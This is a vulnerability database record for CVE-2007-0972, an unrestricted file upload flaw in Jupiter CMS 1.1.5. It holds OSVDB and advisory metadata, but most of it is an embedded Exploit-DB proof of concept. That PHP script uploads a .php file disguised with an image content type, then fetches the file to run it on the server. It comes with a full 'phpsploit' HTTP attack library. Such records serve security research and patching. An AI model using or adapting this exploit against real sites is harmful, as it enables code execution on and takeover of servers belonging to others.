ID CVE-2007-0972 Type cve Reporter NVD Modified 2017-10-18T21:30:06
Description
Unrestricted file upload vulnerability in modules/emoticons.php in Jupiter CMS 1.1.5 allows remote attackers to upload arbitrary files by modifying the HTTP request to send an image content type, and to omit is_guest and is_user parameters. NOTE: this issue might be related to CVE-2006-4875.
{"osvdb": [{"lastseen": "2017-04-28T13:20:30", "references": [], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 33730](https://vulners.com/osvdb/OSVDB:33730)\n[Related OSVDB ID: 33727](https://vulners.com/osvdb/OSVDB:33727)\n[Related OSVDB ID: 33729](https://vulners.com/osvdb/OSVDB:33729)\n[Related OSVDB ID: 33731](https://vulners.com/osvdb/OSVDB:33731)\nOther Advisory URL: http://mgsdl.free.fr/advisories/12070214.txt\nOther Advisory URL: http://www.acid-root.new.fr/advisories/12070214.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0238.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0228.html\nISS X-Force ID: 32517\nGeneric Exploit URL: http://milw0rm.com/exploits/3311\n[CVE-2007-0972](https://vulners.com/cve/CVE-2007-0972)\nBugtraq ID: 22560\n", "edition": 1, "reporter": "OSVDB", "published": "2007-02-14T02:51:48", "title": "Jupiter CMS modules/emoticons.php Unrestricted File Upload", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-0972"], "modified": "2007-02-14T02:51:48", "href": "https://vulners.com/osvdb/OSVDB:33728", "id": "OSVDB:33728", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:11:17", "osvdbidlist": ["33728"], "references": [], "edition": 1, "description": "Jupiter CMS 1.1.5 Remote File Upload Exploit. CVE-2007-0972. Webapps exploit for php platform", "reporter": "DarkFig", "published": "2007-02-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Jupiter CMS 1.1.5 - Remote File Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0972"], "modified": "2007-02-14T00:00:00", "id": "EDB-ID:3311", "href": "https://www.exploit-db.com/exploits/3311/", "sourceData": "<?\n/*\nTitle: Jupiter CMS 1.1.5 File Upload Vulnerability\nAdvisory ID: 12070214\nRisk level: High\nAuthor: DarkFig <gmdarkfig@gmail.com>\nURL: http://www.acid-root.new.fr/advisories/12070214.txt\n*/\n\nerror_reporting(E_ALL ^ E_NOTICE);\n$url = ' http://localhost/jupiter/';\n\n$xpl = new phpsploit();\n$xpl->agent(\"Mozilla\");\n$arr = array(frmdt_url => $url.'modules/emoticons.php',\n \"a\" => 1,\n \"req_file\" => array(frmdt_filename => \"iamaphpfile.php\",\n frmdt_type => \"image/jpeg\",\n frmdt_content => \"<?php echo(iamontheserver); ?>\"));\n$xpl->formdata($arr);\n$xpl->get($url.'images/emoticons/iamaphpfile.php');\nprint($xpl->getcontent());\n\n/*\n * \n * Copyright (C) darkfig\n * \n * This program is free software; you can redistribute it and/or \n * modify it under the terms of the GNU General Public License \n * as published by the Free Software Foundation; either version 2 \n * of the License, or (at your option) any later version. \n * \n * This program is distributed in the hope that it will be useful, \n * but WITHOUT ANY WARRANTY; without even the implied warranty of \n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n * GNU General Public License for more details. \n * \n * You should have received a copy of the GNU General Public License \n * along with this program; if not, write to the Free Software \n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n * \n * TITLE: PhpSploit Class\n * REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4)\n * VERSION: 1.2\n * LICENSE: GNU General Public License\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\n * FILENAME: phpsploitclass.php\n *\n * CONTACT: gmdarkfig@gmail.com (french / english)\n * GREETZ: Sparah, Ddx39\n *\n * DESCRIPTION:\n * The phpsploit is a class implementing a web user agent.\n * You can add cookies, headers, use a proxy server with (or without) a\n * basic authentification. It supports the GET and the POST method. It can\n * also be used like a browser with the cookiejar() function (which allow\n * a server to add several cookies for the next requests) and the\n * allowredirection() function (which allow the script to follow all\n * redirections sent by the server). It can return the content (or the\n * headers) of the request. Others useful functions can be used for debugging.\n * A manual is actually in development but to know how to use it, you can\n * read the comments.\n *\n * CHANGELOG:\n * [2007-01-24] (1.2)\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\n * * New: multipart/form-data enctype is now supported \n *\n * [2006-12-31] (1.1)\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\n * * New: You can now call the getheader() / getcontent() function without parameters\n *\n * [2006-12-30] (1.0)\n * * First version\n * \n */\n\nclass phpsploit {\n\n\t/**\n\t * This function is called by the get()/post() functions.\n\t * You don't have to call it, this is the main function.\n\t *\n\t * @return $server_response\n\t */\n\tprivate function sock()\n\t{\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);\n\t\telse $socket = fsockopen($this->host,$this->port);\n\t\t\n\t\tif(!$socket) die(\"Error: The host doesn't exist\");\n\t\t\n\t\tif($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\";\n\t\telseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. \" HTTP/1.1\\r\\n\";\n\t\telse die(\"Error: Invalid method\");\n\t\t\n\t\tif(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\";\n\t\t$this->packet .= \"Host: \".$this->host.\"\\r\\n\";\n\t\t\n\t\tif(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\";\n\t\tif(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\";\n\t\tif(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\";\n\t\t\n\t\t$this->packet .= \"Connection: Close\\r\\n\";\n\t\tif($this->method===\"post\")\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data.\"\\r\\n\";\n\t\t}\n\t\telseif($this->method===\"formdata\")\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\";\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data;\n\t\t}\n\t\t$this->packet .= \"\\r\\n\";\n\t\t$this->recv = '';\n\t\t\n\t\tfputs($socket,$this->packet);\n\t\twhile(!feof($socket)) $this->recv .= fgets($socket);\n\t\tfclose($socket);\n\t\t\n\t\tif($this->cookiejar) $this->cookiejar($this->getheader($this->recv));\n\t\tif($this->allowredirection) return $this->allowredirection($this->recv);\n\t\telse return $this->recv;\n\t}\n\t\n\n\t/**\n\t * This function allows you to add several cookie in the\n\t * request. Several methods are supported:\n\t * \n\t * $this->addcookie(\"name\",\"value\");\n\t * or\n\t * $this->addcookie(\"name=newvalue\");\n\t * or\n\t * $this->addcookie(\"othername=overvalue; xx=zz; y=u\");\n\t * \n\t * @param string $cookiename\n\t * @param string $cookievalue\n\t * \n\t */\n\tpublic function addcookie($cookn,$cookv='')\n\t{\n\t\t// $this->addcookie(\"name\",\"value\"); work avec replace\n\t\tif(!empty($cookv))\n\t\t{\n\t\t\tif($cookv === \"deleted\") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete\n\t\t\tif(!empty($this->cookie))\n\t\t\t{\n\t\t\t if(preg_match(\"/$cookn=/\",$this->cookie))\n\t\t\t {\n\t\t\t \t$this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie);\n\t\t\t }\n\t\t\t else\n\t\t\t {\n\t\t\t \t$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \".\n\t\t\t }\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->cookie = $cookn.\"=\".$cookv.\";\";\n\t\t\t}\n\t\t}\n\t\t// $this->addcookie(\"name=value; othername=othervalue\");\n\t\telse\n\t\t{\n\t \t if(!empty($this->cookie))\n\t \t {\n\t \t \t$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn);\n\t \t \t$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn));\n\t \t \tfor($i=0;$i<count($cookarr);$i++)\n\t \t \t{\n\t \t \t\tpreg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches);\n\t \t \t\t$cookn = $matches[1];\n\t \t \t\t$cookv = $matches[2];\n\t \t \t\t$this->addcookie($cookn,$cookv);\n\t \t \t}\n\t \t }\n\t\t\t else\n\t\t\t {\n\t\t\t \t$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\";\n\t\t\t \t$this->cookie = $cookn;\t\t\t\n\t\t\t }\n\t\t}\n\t}\n\t\n\t\n\t/**\n\t * This function allows you to add several headers in the\n\t * request. Several methods are supported:\n\t *\n\t * $this->addheader(\"headername\",\"headervalue\");\n\t * or\n\t * $this->addheader(\"headername: headervalue\");\n\t *\n\t * @param string $headername\n\t * @param string $headervalue\n\t */\n\tpublic function addheader($headern,$headervalue='')\n\t{\n\t\t// $this->addheader(\"name\",\"value\");\n\t\tif(!empty($headervalue))\n\t\t{\n\t\t\tif(!empty($this->header))\n\t\t\t{\n\t\t\t\tif(preg_match(\"/$headern:/\",$this->header))\n\t\t\t\t{\n\t\t\t\t\t$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->header .= \"\\r\\n\".$headern.\": \".$headervalue;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->header=$headern.\": \".$headervalue;\n\t\t\t}\n\t\t}\n\t\t// $this->addheader(\"name: value\");\n\t\telse \n\t\t{\n\t\t\tif(!empty($this->header))\n\t\t\t{\n\t\t\t\t$headarr = explode(\": \",$headern);\n\t\t\t\t$headern = $headarr[0];\n\t\t\t\t$headerv = $headarr[1];\n\t\t\t\t$this->addheader($headern,$headerv);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->header=$headern;\n\t\t\t}\n\t\t}\n\t}\n\t\n\n\t/**\n\t * This function allows you to use an http proxy server.\n\t * Several methods are supported:\n\t * \n\t * $this->proxy(\"proxyip\",\"8118\");\n\t * or\n\t * $this->proxy(\"proxyip:8118\")\n\t *\n\t * @param string $proxyhost\n\t * @param integer $proxyport\n\t */\n\tpublic function proxy($proxy,$proxyp='')\n\t{\n\t\t// $this->proxy(\"localhost:8118\");\n\t\tif(empty($proxyp))\n\t\t{\n\t\t\tpreg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr);\n\t\t\t$proxh = $proxarr[1];\n\t\t\t$proxp = $proxarr[2];\n\t\t\t$this->proxyhost=$proxh;\n\t\t\t$this->proxyport=$proxp;\n\t\t}\n\t\t// $this->proxy(\"localhost\",8118);\n\t\telse \n\t\t{\n\t\t\t$this->proxyhost=$proxy;\n\t\t\t$this->proxyport=intval($proxyp);\n\t\t}\n\t\tif($this->proxyport > 65535) die(\"Error: Invalid port number\");\n\t}\n\t\n\n\t/**\n\t * This function allows you to use an http proxy server\n\t * which requires a basic authentification. Several\n\t * methods are supported:\n\t * \n\t * $this->proxyauth(\"darkfig\",\"dapasswd\");\n\t * or\n\t * $this->proxyauth(\"darkfig:dapasswd\");\n\t *\n\t * @param string $proxyuser\n\t * @param string $proxypass\n\t */\n\tpublic function proxyauth($proxyauth,$proxypasse='')\n\t{\n\t\t// $this->proxyauth(\"darkfig:password\");\n\t\tif(empty($proxypasse))\n\t\t{\n\t\t\tpreg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);\n\t\t\t$proxu = $proxautharr[1];\n\t\t\t$proxp = $proxautharr[2];\n\t\t\t$this->proxyuser=$proxu;\n\t\t\t$this->proxypass=$proxp;\n\t\t}\n\t\t// $this->proxyauth(\"darkfig\",\"password\");\n\t\telse\n\t\t{\n\t\t\t$this->proxyuser=$proxyauth;\n\t\t\t$this->proxypass=$proxypasse;\n\t\t}\n\t}\n\n\t\n\t/**\n\t * This function allows you to set the \"User-Agent\" header.\n\t * Several methods are possible to do that:\n\t * \n\t * $this->agent(\"Mozilla Firefox\");\n\t * or\n\t * $this->addheader(\"User-Agent: Mozilla Firefox\");\n\t * or\n\t * $this->addheader(\"User-Agent\",\"Mozilla Firefox\");\n\t * \n\t * @param string $useragent\n\t */\n\tpublic function agent($useragent)\n\t{\n\t\t$this->agent=$useragent;\n\t}\n\n\t\n\t/**\n\t * This function returns the header which will be\n\t * in the next request.\n\t * \n\t * $this->showheader();\n\t *\n\t * @return $header\n\t */\n\tpublic function showheader()\n\t{\n\t\treturn $this->header;\n\t}\n\n\t\n\t/**\n\t * This function returns the cookie which will be\n\t * in the next request.\n\t * \n\t * $this->showcookie();\n\t *\n\t * @return $storedcookies\n\t */\n\tpublic function showcookie()\n\t{\n\t\treturn $this->cookie;\n\t}\n\n\t\n\t/**\n\t * This function returns the last formed\n\t * http request (the http packet).\n\t * \n\t * $this->showlastrequest();\n\t * \n\t * @return $last_http_request\n\t */\n\tpublic function showlastrequest()\n\t{\n\t\treturn $this->packet;\n\t}\n\t\n\t\n\t/**\n\t * This function sends the formed http packet with the\n\t * GET method. You can precise the port of the host.\n\t * \n\t * $this->get(\"http://localhost\");\n\t * $this->get(\"http://localhost:888/xd/tst.php\");\n\t * \n\t * @param string $urlwithpath\n\t * @return $server_response\n\t */\n\tpublic function get($url)\n\t{\n\t\t$this->target($url);\n\t\t$this->method=\"get\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function sends the formed http packet with the\n\t * POST method. You can precise the port of the host.\n\t * \n\t * $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");\n\t *\n\t * @param string $urlwithpath\n\t * @param string $postdata\n\t * @return $server_response\n\t */\t\n\tpublic function post($url,$data)\n\t{\n\t\t$this->target($url);\n\t\t$this->method=\"post\";\n\t\t$this->data=$data;\n\t\treturn $this->sock();\n\t}\n\t\n\n\t/**\n\t * This function sends the formed http packet with the\n\t * POST method using the multipart/form-data enctype. \n\t * \n\t * $array = array(\n\t * frmdt_url => \"http://localhost/upload.php\",\n\t * frmdt_boundary => \"123456\", # Optional\n\t * \"email\" => \"me@u.com\",\n\t * \"varname\" => array(\n\t * frmdt_type => \"image/gif\", # Optional\n\t * frmdt_transfert => \"binary\", # Optional\n\t * frmdt_filename => \"hello.php\",\n\t * frmdt_content => \"<?php echo ':)'; ?>\"));\n\t * $this->formdata($array);\n\t *\n\t * @param array $array\n\t * @return $server_response\n\t */\n\tpublic function formdata($array)\n\t{\n\t\t$this->target($array[frmdt_url]);\n\t\t$this->method=\"formdata\";\n\t\t$this->data='';\n\t\tif(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\";\n\t\telse $this->boundary=$array[frmdt_boundary];\n\t\tforeach($array as $key => $value)\n\t\t{\n\t\t\tif(!preg_match(\"#^frmdt_(boundary|url)#\",$key))\n\t\t\t{\n\t\t\t\t$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\";\n\t\t\t\t$this->data .= \"Content-Disposition: form-data; name=\\\"\".$key.\"\\\";\";\n\t\t\t\tif(!is_array($value))\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\";\n\t\t\t\t\tif(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\";\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\";\n\t\t\t\t\t$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function returns the content of the server response\n\t * without the headers.\n\t * \n\t * $this->getcontent($this->get(\"http://localhost/\"));\n\t * or\n\t * $this->getcontent();\n\t *\n\t * @param string $server_response\n\t * @return $onlythecontent\n\t */\n\tpublic function getcontent($code='')\n\t{\n\t\tif(empty($code)) $code = $this->recv;\n\t\t$content = explode(\"\\n\",$code);\n\t\t$onlycode = '';\n\t\tfor($i=1;$i<count($content);$i++)\n\t\t{\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1;\n\t\t\tif($ok) $onlycode .= $content[$i].\"\\n\";\n\t\t}\n\t\treturn $onlycode;\n\t}\n\n\t\n\t/**\n\t * This function returns the headers of the server response\n\t * without the content.\n\t * \n\t * $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));\n\t * or\n\t * $this->getheader();\n\t *\n\t * @param string $server_response\n\t * @return $onlytheheaders\n\t */\n\tpublic function getheader($code='')\n\t{\n\t\tif(empty($code)) $code = $this->recv;\n\t\t$header = explode(\"\\n\",$code);\n\t\t$onlyheader = $header[0].\"\\n\";\n\t\tfor($i=1;$i<count($header);$i++)\n\t\t{\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$header[$i])) break;\n\t\t\t$onlyheader .= $header[$i].\"\\n\";\n\t\t}\n\t\treturn $onlyheader;\n\t}\n\n\t\n\t/**\n\t * This function is called by the cookiejar() function.\n\t * It adds the value of the \"Set-Cookie\" header in the \"Cookie\"\n\t * header for the next request. You don't have to call it.\n\t * \n\t * @param string $server_response\n\t */\n\tprivate function getcookie($code)\n\t{\n\t\t$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code));\n\t\tfor($z=0;$z<count($carr);$z++)\n\t\t{\n\t\t\tif(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr))\n\t\t\t{\n\t\t\t\t$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));\n\t\t\t}\n\t\t}\n\n\t\tfor($i=0;$i<count($cookie);$i++)\n\t\t{\n\t\t\tpreg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches);\n\t \t $cookn = $matches[1];\n\t \t $cookv = $matches[2];\n\t \t $this->addcookie($cookn,$cookv);\n\t\t}\n }\n\n\t\n\t/**\n\t * This function is called by the get()/post() functions.\n\t * You don't have to call it.\n\t *\n\t * @param string $urltarg\n\t */\n\tprivate function target($urltarg)\n\t{\n\t\tif(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\";\n\t\t$this->url=$urltarg;\n\t\t\n\t\t$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)));\n\t\t$this->host=$array[0];\n\n\t\tpreg_match(\"/:(\\d+)\\//\",$urltarg,$matches);\n\t\t$this->port=empty($matches[1]) ? 80 : $matches[1];\n\t\t\n\t\t$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg));\n\t\tpreg_match(\"/\\/(.*)\\//\",$temp,$matches);\n\t\t$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");\n\t\n\t\tif($this->port > 65535) die(\"Error: Invalid port number\");\n\t}\n\t\n\t\n\t/**\n\t * If you call this function, the script will\n\t * extract all \"Set-Cookie\" headers values\n\t * and it will automatically add them into the \"Cookie\" header\n\t * for all next requests.\n\t *\n\t * $this->cookiejar(1); // enabled\n\t * $this->cookiejar(0); // disabled\n\t * \n\t */\n\tpublic function cookiejar($code)\n\t{\n\t\tif($code===0) $this->cookiejar='';\n\t\tif($code===1) $this->cookiejar=1;\n\t\telse\n\t\t{\n\t\t\t$this->getcookie($code);\n\t\t}\n\t}\n\n\n\t/**\n\t * If you call this function, the script will\n\t * follow all redirections sent by the server.\n\t * \n\t * $this->allowredirection(1); // enabled\n\t * $this->allowredirection(0); // disabled\n\t * \n\t * @return $this->get($locationresponse)\n\t */\n\tpublic function allowredirection($code)\n\t{\n\t\tif($code===0) $this->allowredirection='';\n\t\tif($code===1) $this->allowredirection=1;\n\t\telse\n\t\t{\n\t\t\tif(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr))\n\t\t\t{\n\t\t\t\t$location = str_replace(chr(13),'',$codearr[2]);\n\t\t\t\tif(!eregi(\"://\",$location))\n\t\t\t\t{\n\t\t\t\t\treturn $this->get(\"http://\".$this->host.$this->path.$location);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\treturn $this->get($location);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\treturn $code;\n\t\t\t}\n\t\t}\n\t}\n\t\n\t\n\t/**\n\t * This function allows you to reset some parameters:\n\t * \n\t * $this->reset(header); // headers cleaned\n\t * $this->reset(cookie); // cookies cleaned\n\t * $this->reset(); // clean all parameters\n\t *\n\t * @param string $func\n\t */\n\tpublic function reset($func='')\n\t{\n\t\tswitch($func)\n\t\t{\n\t\t\tcase \"header\":\n\t\t\t$this->header='';\n\t\t\tbreak;\n\t\t\t\n\t\t\tcase \"cookie\":\n\t\t\t$this->cookie='';\n\t\t\tbreak;\n\t\t\t\n\t\t\tdefault:\n\t\t $this->cookiejar='';\n\t\t $this->header='';\n\t\t $this->cookie='';\n\t\t $this->allowredirection=''; \n\t\t $this->agent='';\n\t\t break;\n\t\t}\n\t}\n}\n?>\n\n# milw0rm.com [2007-02-14]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3311/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "references": ["https://vulners.com/securityvulns/securityvulns:doc:16072", "https://vulners.com/securityvulns/securityvulns:doc:16069", "https://vulners.com/securityvulns/securityvulns:doc:16073"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "reporter": " ", "published": "2007-02-14T00:00:00", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:23", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "WebTester", "version": "5.0", "operator": "eq"}, {"name": "Jupiter Cms", "version": "1.1", "operator": "eq"}], "cvelist": ["CVE-2007-0971", "CVE-2007-0970", "CVE-2007-0969", "CVE-2007-0987", "CVE-2007-0973", "CVE-2007-0972", "CVE-2007-0951", "CVE-2007-0950", "CVE-2007-0986"], "modified": "2007-02-14T00:00:00", "id": "SECURITYVULNS:VULN:7236", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7236", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
